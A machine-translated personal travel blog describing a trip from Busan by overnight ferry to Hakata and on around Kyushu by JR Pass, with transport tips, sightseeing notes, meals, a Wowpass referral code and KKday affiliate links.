In the hotel lobby, there is a Wowpass machine. Scan your passport, follow the instructions, and the machine will dispense a Wowpass+Tmoney combined card.
The bottom part is Tmoney, remember to use the bottom part when taking the subway or bus; I failed to use the entire card at first, it seems I was scanning the Wowpass part.
If you want to know the details of Tmoney top-up and deductions, you need to install another app App (BucaCheck):
If this travelogue is helpful to you, you can enter my invitation code
373TBH87
when registering on Wowpass.
After dinner, go to GS 25 to buy Korean beer and Korean snacks. Kelly is delicious, the one on the right is like spicy strips but not as salty and spicy, suitable for drinking, and the crab-flavored biscuits are average.
Rest, end of the busy Day 1.
Early in the morning, take bus 1001
from Busan Station bus stop to Haedong Yonggungsa Temple; frequent schedules, not many people.
The journey is a bit far, about 1 and a half hours. Korean buses are similar to those in Taiwan, and the drivers drive quite aggressively; normally, people get on at the front and get off at the back, but there are also people who get off at the front and get on at the back.
The opposite of the drop-off point is Skyline Luge Busan.
You can see the sign of Haedong Yonggungsa Temple by walking forward after getting off, turn right and walk up a hill road; the map says it takes 15 minutes to walk, but because it’s a hill road, it probably takes about 30 minutes to walk, or you can take a taxi if you don’t want to walk.
You will pass through a shopping street first, and there is also a place nearby similar to a container market where you can take a rest and eat something. When you enter, you can see a row of 12 zodiac representatives, (Dog) Year of the Dog.
You can see the colorful and distinctive archway of Haidong Longgong Temple as you continue forward.
Be careful as you descend the stairs all the way to the main hall of Haidong Longgong Temple.
You can first go to the left observation platform to overlook the entire temple.
Enter the Daxiong Hall, where you can buy tiles outside to write your wishes on (10,000 KRW).
From the Haidong Longgong Temple bus stop, take the 1001
bus back to Haeundae (about 1 hour).
On that sunny day, there was a sand sculpture exhibition on the beach.
Be careful when going down the stairs. Witnessed a Korean uncle stepping into the air and falling into the sand (fortunately it was the sand).
ㄏ
Haeundae LCT, a landmark in Busan.
HAEUNDAE, clear skies.
Haeundae Beach has lifeguards, marked swimming areas, and water activities available.
Had lunch at a Korean BBQ restaurant near Haeundae, Baegnyeon Sikdang, where the staff grilled the meat for us. Ordered Korean beef sirloin and pork neck, both delicious, along with a stone pot rice dish. Shared between two people.
Also ordered Korean beer and soju to enjoy. (Forgot to try the grilled beer).
Next to it is the Haeundae Traditional Market, mainly selling local seafood. Bought an ice cream and walked around, then went to another shop selling ice cream croissants and had a matcha ice cream croissant (crispy outside, soft inside, delicious).
After eating, forgot that Haeundae also has a monorail train to ride and you can also visit Haeundae LCT (didn’t check the Busan itinerary carefully at first). Around 14:00, took the 1001
bus back to Busan Station, thinking about where to go next or just explore Busan Station.
Back to Busan Station around 15:00, still a long time before the cruise check-in time at 18:30. Upon returning to Busan, I found that there was nowhere to shop at Busan Station (apparently no department stores or shopping streets, attractions, etc.); I was afraid it was too far to go to Gamcheon Culture Village, so I only found out that a few stops down from Busan Station, you can go to Busan Tower, where there are department stores and shopping streets nearby.
Originally planned to go to Busan Tower but ended up walking too far from the subway station, so I gave up and returned.
KKday Busan | Longtoushan Park Busan Tower Observatory E-Ticket.
Bought the famous Korean banana milk to drink.
I wandered around near Busan Station until almost five o’clock, then went to the hotel to pick up my luggage and headed to Busan Port International Passenger Terminal.
Entering the Busan Station lobby (2nd floor), find exit 10, walk along the sky bridge to reach Busan Port International Passenger Terminal (about 15 minutes walk).
Do not walk on the ground-level roads, as there are many large vehicles, which is very dangerous.
The Busan Port Bridge during the day.
The Busan Port International Passenger Terminal (pier) is empty inside, not many people, because there are very few daily flights; apart from flights to Fukuoka Hakata, there are also cruises to Shimonoseki, Tsushima Island, Osaka, Kumamoto, etc.
From the lobby to the 3rd floor for departure, first go to New Camellia to exchange for ferry tickets. (Passport required)
Around 17:30, boarding began, the departure hall is quite large; you can actually wander around, buy food to bring on board to eat.
Things to note:
Departure opens at 18:30.
Upon disembarking, the waiting area for the ship is small, with a few duty-free shops and a cafe (the only one selling food). I bought a tuna sandwich to fill my stomach.
I went to the duty-free shop and bought some Korean Toms Gilim almond snacks (classic honey flavor, strawberry chocolate coating, tiramisu flavor) as souvenirs.
After disembarking, you can line up with your luggage. Everyone lines up with their suitcases, getting ready to board the ship.
Probably about 90% of the people are Korean.
You can see Busan Port from the window, and when it’s almost time, everyone will return to their luggage to prepare to board the ship.
It takes about 15-20 minutes to walk from the pier to board the ship.
Room 430, go up to the 4th floor to room 430 after boarding.
The space is very small, accommodating up to 11 people. This time, it was a family (3 people) + two couples (4 people) + me and my friend (2 people), not fully occupied; It seems that people of the same language and nationality are arranged together (except for one couple from Hong Kong and Macau, the rest are Taiwanese).
Luggage settled around 20:00, the ship will depart around 10:30.
On the 3rd floor, there is a restaurant, a convenience store, and vending machines (all using Japanese yen), selling slippers, toiletries, and sanitary products; the restaurant does not serve meals, so you can only buy instant noodles from the convenience store or microwaveable food from the vending machines; Therefore, it is recommended to bring food from Busan.
Note: Meat products cannot be brought into Japan, any leftovers must be discarded. ⚠️
Luckily, I had a sandwich before boarding, so I wasn’t very hungry, just bought some instant noodles to fill up.
Note: The hot water is not available in the restaurant area, only cold water; you need to go to the soup room near the stern of the ship to get hot water, it took me a while to find it.
Also, be careful when operating the water heater, turn on the switch first, water won’t come out immediately, wait a bit, be careful when using the hot water, make sure to turn it off tightly after use to avoid scalding the next person.
After eating, walk around the deck (you can freely enter and exit, be careful of slippery).
Around 21:00, another cruise to Kanmon Strait (PUKWAN FERRY) will depart first.
Look back at the night view of Busan Port Terminal.
Around 22:30, the ship will start to leave Busan Port, passing by Busan Port Bridge. The night view of the bridge is very beautiful (it will be cold, so stay warm).
The lights in the economy cabins will be turned off at 11:00. After watching the departure, you can almost go back to lie down.
Good night, Busan.
Around 5:30 in the morning, arrive at Hakata, the lights in the cabins are turned on; go to the deck to see the peaceful morning of Hakata Port and Hakata Port Tower.
If you have purchased breakfast, you can go to the restaurant to eat. We didn’t, so we slowly freshened up, wandered on the deck, packed up, and prepared to disembark.
Disembarkation will start at 07:30, everyone will queue at the exit of the 3F lobby with their luggage.
Reminder: Hakata Port does not support electronic customs clearance, so be sure to fill out the entry card and customs declaration card. ⚠️
There is a bus to Hakata Station or Tenjin area as soon as you come out.
Around 9:30, after dropping off luggage at the hotel, have a breakfast of Asa no Kaizoku Teishoku at the Hakata Station department store food street to fill your stomach, pick up the JR Pass, and get the ticket for tomorrow morning to Yufuin.
[_Reference itinerary: KKday [Fukuoka Chartered One-Day Tour] Saga Prefecture, Kyushu, Japan Yutoku Inari Shrine, Yanagawa River Cruise, Minami Shimabara Dolphin Watching, Ooarai Shrine’s Torii Gate in the Sea, Takezaki Seafood, Daikousenji Temple Freely choose the attractions you want to visit_](https://www.kkday.com/zh-tw/product/144332?cid=19365&ud1=cb65fd5ab770){:target=”_blank”}
Originally planned to go to Karatsu Castle, after checking the JR limited express schedule, going to Yutoku Inari Shrine is faster and closer, plus the fatigue from yesterday, so decided to change the itinerary.
From Hakata, take a train to Kashima City - Hizen-Kashima Station.
After exiting the station, walk to the left side of the road and wait at bus stop 2 across the street.
The instructions here are different from Google Maps, which told me to walk to Nakamuta Station to wait for the bus, about 500 meters away.
Please note that I went there in June 2024, and the schedule may have changed due to the time.
After getting off at Yutoku Shrine, walk towards Omotesando.
It seems that there were hardly any people or open shops on Omotesando and the shopping street on weekdays.
Keep walking to the end (about 15 minutes), and you will reach the shrine.
At the entrance of the shrine, there is an elevator behind the glass building. If you don’t want to walk up, you can take the elevator for a fee.
As you walk up, there is a row of wind chimes for prayers. When I was there, there were no people, and as I passed by the wind chimes, a gust of wind made them ring loudly.
Pass through the row of torii gates and beautiful hydrangea flowers. You can also climb up to the Okunoin (about 200 meters, steep and difficult to walk).
After visiting, return to the station and take the JR train back.
After comparing the Meoto Iwa sea gate at Oyashiro and Karatsu Castle, I felt that the Meoto Iwa sea gate was ordinary (after all, I have seen the famous sea gate of Itsukushima Shrine) and the transportation was inconvenient. Therefore, I plan to visit Karatsu.
There was a mistake when changing trains. This small station had no electronic signboards. I got off and saw “Towards Karatsu” written on the platform, so I thought I could change trains there. However, when the time came, the train passed through another platform, and I couldn’t get on in time.
After careful examination, I realized that I needed to check the small box in the bottom right corner of the timetable to find the correct waiting platform. The platforms on weekdays and holidays may not be the same.
Since I missed the train to Karatsu and couldn’t go back to Meoto Iwa sea gate, and considering yesterday’s embarrassment, I decided to go back to the hotel in Hakata to rest.
On the way back, I also discovered something interesting. I was wondering why the trains at the small stations didn’t open their doors (I was in the rear car). Upon closer observation, I found out that at stations without station staff, the train conductor is the station staff. To get off, you need to get off from the first car and pay the fare using the coin slot or swipe your transportation card (similar to buses). If you have a JR Pass, you just need to show it to the driver.
Also, a reminder, if you are at an unmanned JR exit, just walk out with your JR Pass, do not throw it into the ticket recycling box.⚠️
Note that the washing machine at Toyoko Inn may not have detergent. Please make sure if it is an automatic detergent dispenser machine before washing.⚠️
If not, you need to use coins or buy detergent at the front desk. (30 yen)
After putting the clothes in the washing machine, I went to the underground street of Hakata Station to find food.
I bought a beef bento for dinner, it was great; the tea wine was okay, not much flavor.
I also bought Yakult to drink at night, BRULEE caramel ice cream for dessert (very sweet!), and fried shrimp as a midnight snack (this time I bought the whole fried shrimp, previously bought a fake one in Kumamoto QQ).
Laundry (30 mins), drying (1 hr), rest.
Early in the morning, checked out and headed to JR Hakata Station to take the Yufu 1
to Yufuin.
Upon arrival at Yufuin Station, immediately turn right and go to the Coin Lockers to store luggage, as there are fewer spaces for luggage due to the luggage size. (1,000 yen)
Possibly due to the season and weather, it felt overall gray and green, without any special feeling when I went.
Walking along the street, you will reach Kinrinko Lake, a green lakeside exuding a hint of tranquility.
Lake Kinrinko is very clean and clear, with many maple leaves (not yet changed color) by the lake.
The street from Yufuin Station all the way to Lake Kinrinko is full of IP and cultural and creative small shops to explore. If you are interested in food, you can also check out the award-winning desserts in Yufuin, such as pudding, ice cream, and more.
Of course, you can also see the Totoro Forest, Ghibli Shop, and the “Kyushu specialty” Kumamon everywhere.
The Showa Museum in Yufuin has a very traditional Japanese feel.
The Flower Village seemed too touristy and crowded, so I didn’t go in specifically.
On the way, I bought the famous pudding taiyaki and some souvenirs (sesame powder, Yufuin Brick Factory - Shichifuku, cultural and creative items, Yufuin incense…).
Side note: Can you believe I ran into a colleague in this paradise of Yufuin XD - Pinkoi Community Sister
For lunch, we originally planned to eat the famous Yufu Mabushi, a Yufuin kamameshi dish. There are two locations, one at the main store near Lake Kinrinko and one at the station exit. The one at the station exit was closed that day, and we were too lazy to walk back to the main store, so we ended up eating at Sushi Minamoto on the 1st floor.
I had the Bungo beef steak, and my friend had the rice bowl; the beef was delicious, very fragrant, juicy, and not too gamey, and the price was reasonable.
After eating, we strolled around until around 15:00 and then took a car to continue to Oita.
There are quite a few trips from Yufuin to Oita, and there are fewer people (maybe more people are returning to Hakata?). There are also local trains. This time we took the local train directly and practiced the new Japanese I learned:
1
+2
+
この電車は大分に行きますか。
+はい、大分に行きます。
+
I happened to encounter an art installation at Oita Station (it even makes sounds).
Oita gives off a quiet atmosphere, away from the hustle and bustle. When wandering in the city area, it feels unusually quiet, with only the faint sound of car engines, and not many people or car noises.
First, drop off your luggage at the hotel. The layout of Toyoko INN is similar, and I happened to get a room with the same layout and angle as the one in front of Hakata Station yesterday, but the difference is that the bathroom here is bigger and the hallway is smaller.
It’s still early, so I thought about taking a walk around the area and casually opened Google Maps to see nearby attractions.
On the way to Oita Castle Ruins, there is a huge bougainvillea at the park’s parking lot (looks like some curse from Jujutsu Kaisen).
Oita Castle Ruins only have moats, walls, and gardens left. Inside is an open parking lot and a platform for the castle tower, where you can overlook Oita City.
The official AR App allows you to see what Oita Castle looked like before.
Strolling back to the station market for food, Oita’s buses have a nostalgic feel but are well-maintained.
Not sure what to have for dinner, so I randomly bought a pork cutlet rice bowl and a non-alcoholic Suntory sparkling drink (delicious!); the Japanese sauce packets are thoughtfully designed with a small corner for easy opening.
For supper, there was strawberry smoothie ice cream, barbecue, and limited edition Kirin pineapple liquor (enough pineapple flavor, a bit sweet).
Itinerary reference:
KKday Beppu Yufuin Day Tour Nishi Ryoji + Beppu Hells + Yufuin (Departing from Fukuoka)
Kyushu Beppu Hell Hot Spring Tour | Regular Ticket / Presale Ticket | Buy Now
It only takes about 15 minutes by JR Limited Express from Oita Station to Beppu Station, and the scenery along the way is somewhat similar to the feeling of Hiroshima to Onomichi.
Heading to Beppu Hell by taking a bus from JR - the first one is Sea Hell, the order can be referred to the itinerary in the picture.
Sea Hell is the most spectacular in my opinion, with constantly churning steam and deep blue spring water.
There is a platform and a small shrine behind.
The small blood pond on the other side is quite unique.
After leaving Sea Hell, follow the signs to reach the next Oniishibozu Hell.
Mainly a mud geyser hell.
There are signs pointing to the next hell when you come out.
The milk pond in Kamado Jigoku feels great to soak in.
But the feature of Kamado Jigoku is not spring water, it’s smoke. The staff will use incense and blow air towards the hot spring steam to produce a lot of smoke, which is quite interesting (according to the explanation, it’s because the particles of incense will attract more water vapor molecules causing aggregation).
Another feature of Kamado Jigoku is the row of hot spring experiences, such as rock bath, drinking salty thick hot spring water, foot bath, steaming face, hands, and throat (similar to a pediatrician in Taiwan XD).
The space here is larger, with more experiences available, and the shops also sell some food, so you can take a break here.
You can see a sign pointing to Oniyama Hell when you come out.
The boiling water in Oniyama Hell is more intense, constantly surging out.
The other side of the park is the crocodile park.
Coming out and following the instructions will lead you to Shiraike Jigoku.
You will pass by the Jigoku Onsen Museum (cafe) where you can take a break.
Shiraike Jigoku is relatively unremarkable, with a small tropical fish aquarium.
The remaining Blood Pond Jigoku and Tornado Jigoku are not in this area and require taking a bus to reach.
Coming out of Shiraike Jigoku, walk down to the intersection and turn left, then head to the waiting area at Iron Wheel Station No. 2.
First, visit Blood Pond Jigoku, a larger version of the small blood pond in Umi Jigoku.
Walking down will lead you to Tornado Jigoku.
Tornado Jigoku is a geyser that erupts intermittently, about every 30-40 minutes, lasting 6-10 minutes each time. You can inquire with the staff at Tornado for the eruption schedule (we were informed by the staff), if it’s about to erupt, you can watch it first, otherwise, head to Blood Pond Jigoku.
The smoke during the eruption forms a tornado, hence the name.
Lunch can be enjoyed directly at the Gokuraku Pavilion in Blood Pond Jigoku.
Try the famous Hell Gokuraku Curry, with Japanese-style rice topped with thick curry (mildly spicy), grilled vegetables, and chicken, it’s delicious and refreshing without being greasy.
After eating, check out nearby attractions such as Kibune Castle, Cross Mountain Observatory, Me-tan Jigoku, Yunohana…
On the way back to Iron Wheel 2 Bus Station, consider visiting Kibune Castle. The castle is small, but the view from the lookout is nice. However, it’s quite tiring to walk uphill from the bus station.
The Cross Mountain Observatory, Me-tan Jigoku, and Yunohana are actually further up from Umi Jigoku; if you plan your itinerary again, you should visit these attractions first before heading down to Umi Jigoku, then proceed all the way to Blood Pond Jigoku and Tornado Jigoku, or vice versa starting with Blood Pond and Tornado.
Return the translated text:
Boarded the bus again to cross the sea of hell, heading to the Cross Mountain Observatory in Beppu City; the sun was scorching hot, and the observatory only had restrooms, no shops or resting areas.
The lush greenery on the opposite side of the entrance was very beautiful.
Since it was a night view, there wasn’t much to see in the morning, just the scorching sun.
Descending back to Alum Hell, the ticket counter is across from Okamotoya Pudding Shop, just ask the staff to go across.
You can taste a steamed pudding from hell before leaving.
The Yunohana Cottage is used to dry and crystallize hot springs, and going up to the Yunohana Shop, you can buy hot spring bath salts.
Bought some bath salts, face masks, and lotion as souvenirs at the Yunohana Shop.
Also, they offer Private Bath for those who are shy to go to public baths.
Around 4:00 PM, getting ready to take the bus back to the city.
After returning to Beppu Station, walk to Beppu Tower, and explore the area on the way. (Front statue, old hot spring pavilion, and O-Tengu)
Buy tickets from the vending machine on the first floor of Beppu Tower, take the elevator up, and enjoy the cityscape of Beppu’s coastal area.
Viewing the streets and cars from above is very soothing.
There is a meteorite exhibition inside the tower.
In addition to the Beppu Tower, you can also take a cable car or visit the new Beppu - Tower of the World.
The Beppu Tourism Bureau website also provides other itinerary references :
Return to the hotel to rest.
After resting at the hotel, go to the Oita Station market to buy dinner, pork cutlet bento, and Oita limited fruit wine (refreshing and not too sweet).
Desserts/late-night snacks include fried shrimp, instant noodles, white peach ice cream, and jasmine tea (I don’t like jasmine tea).
[_KKday itinerary reference: Japan Fukuoka Kitakyushu chartered one-day tour Dazaifu Tenmangu Shrine, Moji Port, Karato Market, Kanmon Straits, Akama Shrine_](https://www.kkday.com/en/product/157874?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
Start from Oita to Kokura, then go to Moji Port, Shimonoseki. Shimonoseki and Karatsu are about 140 kilometers apart, and normal people wouldn’t plan this itinerary; because on the first day in Japan, I took the wrong train and missed Karatsu, so I really wanted to visit this place, hence the determined one-day trip to Karatsu.
Woke up late, around 8:40 from Oita took the JR Limited Express to Kokura, planning to leave luggage in Kokura and then take a branch line to Moji Port.
It started drizzling in Oita, and I realized it has rained in every city I’ve visited. (Rain god confirmed)
Around 10 o’clock arrived at Kokura Station, wandered around for a while, all the self-service cloakrooms were full (a friend said there were spots at 9 o’clock), the manned cloakroom opens at 11 o’clock, so I had to carry my luggage and go directly to Moji Port to check there.
After exiting Moji Port Station, turn left (no need to leave the building), there are self-service Coin Lockers, quite crowded this time, all full; fortunately, the manned luggage counter has started operating, successfully checked luggage (but the manned counter only operates until 8 pm! ⚠️).
I was thinking of having some Moji curry bread, last year there was no queue, enjoyed it without waiting, but upon exiting the station, I saw a long queue and gave up, turned right to Moji Port Bus Station to wait for the bus to Shimonoseki.
Got off at the underground pedestrian walkway at Shimonoseki Station, this time looking at the Kanmon Bridge from a different angle, the view on the right is from the Moji Port Retro Observatory.
Here is the translated content:
Here is a torii gate at the Hofuri Shrine, with the Hofuri Shrine and Hofuri Shrine Observatory on the mountain behind.
From the pedestrian entrance, take the elevator to B1 to enter the hiking area. Admission is free for pedestrians, but bicycles are charged a 20 yen toll. Also, be aware that there are wild boars in the area.
The trail is 780 meters long, straight all the way to the end, with a dividing line in the middle.
After passing through the gate, there are shops selling simple snacks. I bought an octopus cake to fill my stomach. (It’s chewy inside, crispy on the outside, with real octopus, delicious!)
From the opposite angle, you can see the Kanmon Bridge and the Moji Port Retro Observatory, giving a feeling of looking from Bali, Taiwan to Tamsui.
Continue hiking along the coast to the Karato Market.
On the way to the Karato Market, you will pass by the Akama Shrine, so it’s worth stopping by for a visit.
On the coast outside the Karato Market, many people buy food and have picnics outside. Although there are many people, it is still very clean. Since I was mainly sightseeing and not a big fan of raw food, I didn’t go inside to see, but it seemed crowded at lunchtime.
After the Karato Market, you can take a ferry back to Moji Port. You can buy tickets at the ticket machine outside the store on the other side. If you have time, you can also visit Ganryu Island (Let’s duel! The sacred place!).
It takes about 10 minutes to reach Moji Port. (It really feels like taking a ferry from Tamsui to Bali!)
As it started to rain when I returned to Moji Port, and I had visited Moji Port last year, I didn’t stay long and prepared to go to the station to pick up my luggage and head to Kokura and Hakata.
It’s around 14:00, and I checked the time to find that I would arrive at Karatsu Castle around 4:30. Every second counts, so I harnessed the power of New Taiwan Dollars (JPY) in Kokura, directly purchasing a ticket for the San’yo Shinkansen Kokura to Hakata segment, where the world’s fastest 300km/h bullet train races. It only takes 15 minutes to reach there (compared to 45 minutes for JR Express and 65 minutes for local trains).
The JR Pass Kyushu does not cover the San’yo Shinkansen (Kokura-Hakata segment). For Nozomi and Mizuho trains, you need to buy separate tickets at the Shinkansen platform. Using the JR Pass will result in denial of entry. Even if you accidentally enter or exit, you will be refused and need to purchase a ticket (based on past experience).⚠️
From JR Karatsu, it takes about 20 minutes to reach Karatsu Castle. I decided to take the highway bus, which drops off passengers before Karatsu Castle’s bridge. (It was my first time taking it!)
Upon arrival in Hakata, I took the subway to Tenjin Minami and stored my luggage in the underground shopping area. (Luckily, I found the last available locker at spot 2.)
From Exit 8 of Tenjin’s underground street, follow the signs to Fukuoka Mitsukoshi department store and head to the 3rd floor of Tenjin Bus Center to reach the bus stop.
As I was unsure about seat reservations and ticket purchases, I directly went to the counter to buy a ticket. After buying the ticket, feeling hungry, I grabbed a bread from Starbucks and queued up at the designated platform for boarding. (Later, I found out that no seat reservations are needed for Karatsu, and you can use a transportation card just like taking a bus. The fare is a fixed 1,100 JPY regardless of the stop.)
At 15:02, I boarded the high-speed bus to Karatsu (Hodoyabashi), with the bus occupancy rate at around 80%.
The image on the right shows the view of Fukuoka Tower from this road last year, and this year, it’s the view of Fukuoka Tower from this road. (A sense of time and space overlapping.)
Mainly commuting in Japan, after passing through Karatsu city, I was the only person left on the bus. I rode all the way to the final stop — Hodoyabashi.
[_KKday private car itinerary reference: “[Fukuoka Private Car Day Tour] Kyushu, Fukuoka Prefecture Fukuoka Tower, Dazaifu Tenmangu Shrine, Ohori Park, Karatsu, Sakurai Futamiura, Yobuko Asaichi, Shima, Tenjin Underground Street Flexible itinerary combination!”_](https://www.kkday.com/zh-tw/product/144234?cid=19365&ud1=cb65fd5ab770){:target=”_blank”}
After getting off, a short walk ahead is Hodoyabashi, and walking further back leads to Karatsu Castle. Seeing the view of the bridge and castle from this angle made all the traveling worthwhile.
Around 16:35, with only 25 minutes left before Karatsu Castle closed, I decided to take a stroll since I was already there.
Karatsu Castle requires a walk up a hill from below. With time running out, I turned left and took the elevator up to Maizuru Park next to it.
A one-way elevator ride costs 100 JPY. Purchase a ticket from the vending machine at the entrance and hand it to the staff.
The Tenshukaku is closed for visitors, just come up to see the scenery and Karatsu Castle.
Return to the entrance before the elevator closes, and walk back to JR Karatsu Station following the tourist map.
Take the stone wall path to Karatsu Shrine. (Few people on the way, desolate)
Karatsu Shrine (closed after 17:00), Former Karatsu Bank (designed by the same architect as Tokyo Station - Kingo Tatsuno).
Near the station is the Hikiyama Exhibition Hall (also closed after 17:00), where you can only see small models at the station.
Take JR back to Hakata (Tenjin Minami) when you arrive at Karatsu Station; encountered an issue when exiting the station, as it is JR Karatsu Station for entry and subway Tenjin Minami for exit, the station staff does not recognize JR Pass and requires a separate ticket for the whole journey (JR Karatsu to Tenjin Minami) QQ.
It was raining heavily in Hakata (the rain god was angry), so I bought a rice ball in Tenjin Underground Street for dinner and headed to the hotel with my luggage.
APA Hotel Fukuoka-Watanabedori EXCELLENT
This APA hotel has a larger space, but the overall facilities are quite old. It was my first time staying in an APA without a unit bath, and there is no hot spring bath, smart integration (check washing machines, Airplay…).
Snack was strawberry smoothie, late-night snack was convenience store fried chicken, and Akiya (very sweet).
End of a long day.
It was cloudy in the morning, also the last day of JR Pass, unable to change the itinerary, had to continue taking the train to Sasebo.
JR journey takes about an hour and a half, recorded a segment of the JR Kyushu train broadcast as a memory.
The last segment from Saga to Sasebo will be reversed (about 10 minutes). If you are afraid of motion sickness, you can use your feet to block and switch the direction of the seat.
After exiting Sasebo Station, cross the road to the opposite side and walk to find bus stop No. 6, heading to “Kujukushima Aquarium.”
Transfer to a bus to Kujukushima Aquarium Station and walk about 5 minutes to the Kujukushima Cruise Visitor Center, where you can buy tickets to board the ship. (Show your JR Pass for a discount)
KKday Online Ticket Purchase: Japan Kyushu Nagasaki | Kujukushima Cruise Ticket
Kujukushima Official Website Information
This time, I boarded the white Pearl Queen at 11:00.
Heavy rain, bad weather, unable to become the king of the sea, can only hold an umbrella, blow the wind, and get wet in the rain.
There are broadcasts in Chinese, English, Japanese, and Korean on board, the journey takes about 50 minutes, there are toilets and a shop.
You can go up to the deck and birdwatching platform outside the cabin, but we didn’t go up due to heavy rain and strong winds that day.
When the ship passes between two islands, the wind can be particularly strong, so be careful.
There are seats inside the cabin.
After the tour in heavy rain without seeing much, we returned to Sasebo all the way.
On the way back, stop by Hachi no Ie to taste the famous lemon steak from Sasebo.
Lemon steak is four thin slices of steak + sauce + lemon slices + lemon juice, refreshing taste, slightly insufficient amount of meat.
After eating, I ordered another specialty fruit puff, which is filled with generous fillings and real fruit chunks inside.
After eating, I strolled through the shopping street and took the bus back to the station.
Taking the train back to (Hakata, Takeo Onsen) direction, this is the terminal station, so you have to wait for the cleaning staff to finish cleaning before boarding; just like when you came, the train will reverse from Early Qi to Sasebo.
The time is about 13:30.
You can also go to Huis Ten Bosch in Sasebo, but I didn’t specifically plan to go there.
KKday Sasebo reference itinerary:
_KKday itinerary reference: “Kyushu Saga One-day Tour Yutoku Inari Shrine, Ureshino Onsen, Mikunoyama Park, Takeo Library & Takeo Shrine/Tosu Premium Outlets Departing from Fukuoka Hakata”_
Last time I changed trains at Takeo Onsen on the way to Nagasaki, I didn’t have much impression of this station. Later, I followed Takeo City’s tourism IG (the official account regularly holds events, such as free firefly shuttle service, if you want to go to Takeo for hot springs and accommodation, you can follow it.) This time I thought it was a good opportunity to pass by + had time to take a look.
From Takeo Station (unmanned station, no need to insert JR Pass, just exit), when you come out on the street, there are few people and it’s very quiet.
Just passing by, I only went to the main attractions I found, which happened to be diagonally opposite. There are not many bus schedules, and I didn’t want to wait, so I walked directly.
First, I went to Takeo Shrine, and on the way, you will pass by Tsukasaki Okusu, a small attraction.
Tsukasaki Okusu, estimated to be 2,000 years old.
From the bottom, walk up a short flight of stairs to the Takeo Shrine.
Next to the Takeo Shrine, pass through the sacred tree gate and walk about 5 minutes to see the legendary Takeo Great Camphor Tree. (Estimated age of the tree is 3,000 years.)
The Takeo Great Camphor Tree is enclosed and can only be viewed from a distance.
Bought a Takeo Shrine Great Camphor Tree guardian charm (1,500 yen), larger in size + wooden box.
After visiting the Takeo Shrine, walk back to see the other side of the Horaiyu Monument.
The entire hot spring street is deserted, with several hot springs and hotels to choose from (not necessarily Horaiyu), if you want a quiet and convenient transportation option for hot spring bathing in Kyushu, Takeo Onsen is a great choice!
Just a visit here.
After entering the monument, there is the Horaiyu hot spring for bathing, and on the other side, there is the Egret Hot Spring for accommodation.
Takeo City tourist map, found information about the Mifuneyama Rakuen which looks good, but it was already around 15:30, too late to go.
Boarded the express train to Hakata, returned to Hakata around 18:00.
Strolled back to the hotel, dinner casually solved at the convenience store, rice balls, pork cutlet sandwich, Fujiya Peach Soda (delicious!); stayed at APA and Toyoko Inn many times before realizing they have ice makers, so cool!
Excluding the old equipment, the room size and view of this APA hotel are really nice.
No more JR Pass.
[_KKday charter itinerary reference: “[Fukuoka Charter Day Tour] Kyushu, Fukuoka Prefecture Fukuoka Tower, Dazaifu Tenmangu Shrine, Ohori Park, Karatsu, Sakurai Futamiura, Yobuko Asaichi, Itoshima, Tenjin Underground Street Flexible itinerary combination!”_](https://www.kkday.com/zh-tw/product/144234?cid=19365&ud1=cb65fd5ab770){:target=”_blank”}
After checking out of the hotel in the morning, take the JR to Kyudai Kenkyu Toshi Station.
Upon exiting, the platform for the Nishi-no-Ura Line is on the left-hand side, with staff guiding the way, the ride takes about 30 minutes.
The fare is the highest bus fare I have taken, 730 Japanese yen.
After getting off, it is the couple rocks of Sakurai Futamiura.
It looks very beautiful and peaceful.
After this, you can visit Sakurai Shrine (it is said that many fans go there to pay homage because it has the same name as the Japanese group Arashi members) or go further to Kaiya Omon Sightseeing Boat (looks cool!).
The return schedule, direct to Hakata every hour in the afternoon, and to Kyudai University Research City Station every hour.
Back to Hakata around 12:30 noon, first go for food.
Visit again Hakata Miyachiku (Japan’s Miyazaki beef specialty store Hakata Miyachiku) to taste Miyazaki beef commercial lunch.
The commercial lunch has a high cost-performance ratio (the evening offers high-end yakiniku set meals) + individual compartments for social anxiety.
This time I ordered the lean meat set meal 200g for 3,200 Japanese yen, and devoured two bowls of rice (rice soup is free to refill).
After returning to Hakata, take the train to Nanzoin-mae Station.
Walk out of the station, pass by Kojin Tea House (you can take a break and have lunch here), cross the street, and you will reach the entrance of Nanzoin.
After climbing the platform, you can see the main statue of the reclining Buddha, with scriptures on the soles of the feet, overall very magnificent and solemn.
After the visit, take the train back to Hakata Station, arriving around 15:40.
Visit some places in Kyushu that were missed last time.
Gion - Tochoji Temple
You can visit the Fukuoka Daibutsu on the second floor of Tochoji Temple (50 yen). After the visit, you can have dinner at 17:00 at the Teppan Fried Dumplings Iron Pot, which is open for another hour, and then go to Ohori Park.
Ohori Park
Ohori Park is quite large, it takes about 45 minutes to walk around; you can also ride a swan boat.
Fukuoka City Art Museum is closed on Mondays, so you can only admire Yayoi Kusama’s pumpkin from a distance.
By the time you finish exploring, it’s about 17:00, time for dinner!
I’ve been here once before and still remember the crispy fried dumplings.
There is another branch - Teppan Fried Dumplings Iron Pot Hakata Gion Store, but when I passed by a few days ago, the door was locked with a notice saying it’s under renovation, please visit the main store. (However, Google Maps still shows it’s open)
Self-service for sauce and water.
The store only accepts cash, no electronic payments. ⚠️
Around 17:20, seeing people waiting outside, shortly after, the elderly lady staff came out to welcome us in.
This time I knew to order two servings of fried dumplings. Last time, the elderly lady gestured that one serving wasn’t enough (I didn’t understand at that time), 1 serving with 8 dumplings (500 yen), two servings with 16 dumplings, and a glass of draft beer to end this round!
The dumplings are freshly made and fried, they sizzle when served, the skin is thin and crispy, and the filling is probably chive and pork, simple, not salty, and full of the ingredients’ own flavors.
After finishing eating at 18:00, some people started queuing outside.
After dinner, on the way back to the hotel, passing by the preparations for Nakasu Yatai, this time I found many shared bicycles.
I’ve been changing hotels this time, so tired; this is the hotel for the last three days.
For dessert, ice cream, and late-night snack, a convenience store hot dog.
[**Join the “【Group Tour, Daily Departure】Japan Kyushu Day Tour | Takachiho Gorge & Amano Iwato Shrine & Tian’an River (including special Aso Akagyu BBQ set meal) | Departing from Fukuoka” itinerary directly.**](https://www.kkday.com/zh-tw/product/32511-kyushu-chinese-guided-day-tour-from-fukuoka-takachiho-gorge-kamishikimi-kumanoimasu-shrine-amanoiwato-shrine?cid=19365&ud1=cb65fd5ab770){:target=”_blank”} |
Find the guide for the day trip to your destination in front of the square at LAWSON Hakata Station Hakozaki Exit Store. (There will be several groups at the same time, including those led by KKDAY, EasyGo, those going to Takachiho, those going to Yufuin, etc.)
The guide (Chinese) has a list and will tell you the car number after check-in. Remember the car number and you can board directly.
